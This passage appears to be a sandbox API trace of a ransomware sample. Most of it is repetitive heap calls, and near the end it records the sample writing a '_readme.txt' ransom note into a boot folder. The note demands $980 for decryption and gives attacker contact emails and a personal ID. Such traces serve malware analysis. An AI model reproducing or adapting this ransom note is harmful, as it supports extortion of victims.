hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.951] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0142.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.951] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.951] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.952] PathFindFileNameW (pszPath="") returned="" [0142.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.952] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.952] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.952] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.952] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.952] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0142.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.952] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0142.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.953] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.953] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.953] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", 